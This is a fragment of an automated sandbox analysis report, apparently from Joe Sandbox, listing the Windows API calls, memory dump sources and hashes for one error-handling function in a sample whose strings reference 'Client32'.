                                                                                          • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                          • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                          • API String ID: 2400454052-4183089485
                                                                                          • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                          • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                          • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                          • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88